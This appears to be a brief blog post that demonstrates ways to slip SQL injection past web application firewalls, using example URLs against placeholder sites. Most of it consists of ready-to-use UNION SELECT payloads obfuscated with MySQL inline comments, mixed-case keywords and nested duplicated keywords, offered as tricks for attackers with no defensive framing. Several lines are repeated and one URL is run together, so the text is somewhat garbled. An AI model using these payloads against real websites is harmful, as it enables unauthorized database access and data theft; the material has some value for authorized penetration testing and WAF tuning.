Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass Web application firewall (WAF).
Sqli
http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— –
http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— –
By passed Sqli
http://xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— –
http://xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— –
By Function Capitalization:-
Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass by case changing.
Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass by case changing.
Actual query
http://xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
http://xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query to bypass the WAFhttp://xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5—
By Replaced Keywords:-
Some WAF’s will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another like below script.
Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5– –
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5– –
We hope you enjoyed this trick.!!
No comments:
Post a Comment